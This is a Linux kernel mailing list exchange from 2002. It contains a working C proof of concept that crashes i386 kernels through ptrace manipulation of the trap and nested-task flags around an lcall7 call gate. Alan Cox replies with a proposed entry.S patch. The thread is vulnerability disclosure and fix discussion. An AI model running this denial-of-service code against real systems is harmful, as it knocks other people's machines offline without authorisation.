Here's a little clarification on the problem:
On Wed, 13 Nov 2002, Stefan Laudat wrote:
> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(
Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).
However this updated version works much better:
#include <sys/ptrace.h>
struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};
int main( void )
{
int pid;
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;
if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}
return 1;
}
At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.
--
Christophe Devine
> -----Original Message-----
> From: Alan Cox [mailto:[email protected]]
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
>
>
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago
>
Try this
(In the Linus Torvalds tradition its not tested)
--- arch/i386/kernel/entry.S~ 2002-11-13 21:30:37.000000000 +0000
+++ arch/i386/kernel/entry.S 2002-11-13 21:29:47.000000000 +0000
@@ -126,6 +126,7 @@
ENTRY(lcall7)
pushfl # We get a different stack layout with call
# gates, which has to be cleaned up later..
+ andl $~0x4500, (%esp) # Clear NT since we are doing an iret
pushl %eax
SAVE_ALL
movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
@@ -148,6 +149,7 @@
ENTRY(lcall27)
pushfl # We get a different stack layout with call
# gates, which has to be cleaned up later..
+ andl $~0x4500, (%esp) # Clear NT since we are doing an iret
pushl %eax
SAVE_ALL
movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
@@ -390,6 +392,9 @@
pushl $do_divide_error
ALIGN
error_code:
+ pushfl
+ andl $~0x4500, (%esp) # NT must be clear, do a cld for free
+ popfl
pushl %ds
pushl %eax
xorl %eax, %eax
@@ -400,7 +405,6 @@
decl %eax # eax = -1
pushl %ecx
pushl %ebx
- cld
movl %es, %ecx
movl ORIG_EAX(%esp), %esi # get the error code
movl ES(%esp), %edi # get the function address